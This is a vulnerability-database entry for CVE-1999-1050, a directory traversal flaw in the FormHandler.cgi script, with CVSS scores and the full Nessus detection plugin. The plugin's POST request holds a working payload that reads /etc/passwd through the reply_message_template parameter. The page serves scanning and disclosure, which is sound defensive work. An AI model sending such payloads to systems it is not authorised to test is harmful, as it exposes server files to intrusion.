Vulnerabilities > CVE-1999-1050 - Unspecified vulnerability in Matt Wright Formhandler.Cgi 1.0/2.0/3.0

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
matt-wright
nessus
exploit available
NVD
Published: 1999-11-12
Updated: 2017-12-19

Summary

Directory traversal vulnerability in Matt Wright FormHandler.cgi script allows remote attackers to read arbitrary files via (1) a .. (dot dot) in the reply_message_attach attachment parameter, or (2) by specifying the filename as a template.

Vulnerable Configurations

Part Description Count
Application
Matt_Wright
3

Exploit-Db

descriptionMatt Wright FormHandler.cgi 2.0 Reply Attachment Vulnerability. CVE-1999-1050 . Remote exploit for unix platform
idEDB-ID:19620
last seen2016-02-02
modified1999-11-16
published1999-11-16
reporterm4rcyS
sourcehttps://www.exploit-db.com/download/19620/
titleMatt Wright FormHandler.cgi 2.0 Reply Attachment Vulnerability

Nessus

NASL familyCGI abuses
NASL idFORMHANDLER.NASL
descriptionThe
last seen2020-06-01
modified2020-06-02
plugin id10075
published1999-12-13
reporterThis script is Copyright (C) 1999-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/10075
titleMatt Wright FormHandler.cgi Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if(description)
{
  script_id(10075);
  script_version ("1.41");
  script_cvs_date("Date: 2019/05/29 10:47:07");

  script_cve_id("CVE-1999-1050");
  script_bugtraq_id(799);

  script_name(english:"Matt Wright FormHandler.cgi Arbitrary File Access");
  script_summary(english:"Attempts to read /etc/passwd.");
 
  script_set_attribute(attribute:"synopsis", value:
"A web application on the remote host is affected by an information
disclosure vulnerability." );
  script_set_attribute(attribute:"description", value:
"The 'FormHandler.cgi' CGI application installed on the remote host is
affected by an information disclosure vulnerability that lets anyone
read arbitrary files with the privileges of the web server. An
unauthenticated, remote attacker can exploit this to disclose
sensitive information, which could be used to facilitate further
attacks.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Nov/166");
  script_set_attribute(attribute:"solution", value:
"Remove FormHandler.cgi from the web server.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:U/RC:ND");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:U/RC:X");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-1999-1050");

  script_set_attribute(attribute:"vuln_publication_date", value: "1999/11/11");
  script_set_attribute(attribute:"plugin_publication_date", value: "1999/12/13");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 1999-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencie("http_version.nasl", "smtp_settings.nasl");
  script_require_ports("Services/www", 80);

  exit(0);
}

#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);

domain = get_kb_item("Settings/third_party_domain");
if(!domain) domain = "example.com";

url = '/FormHandler.cgi';
header = make_array("Content-type", "application/x-www-form-urlencoded");
postdata = string(
  "realname=", SCRIPT_NAME, "&",
  "email=aaa&",
  "reply_message_template=%2Fetc%2Fpasswd&",
  "reply_message_from=nessus%40", domain, "&",
  "redirect=http%3A%2F%2Fwww.", domain, "&",
  "recipient=nessus%40", domain
);
res = http_send_recv3(
  method:"POST",
  item:url,
  port:port,
  add_headers:header,
  data:postdata
);
if (isnull(res)) exit(1, "The server on port "+port+" didn't respond.");

if(egrep(pattern:"root:.*:0:[01]:.*", string:res[2])) security_warning(port);

References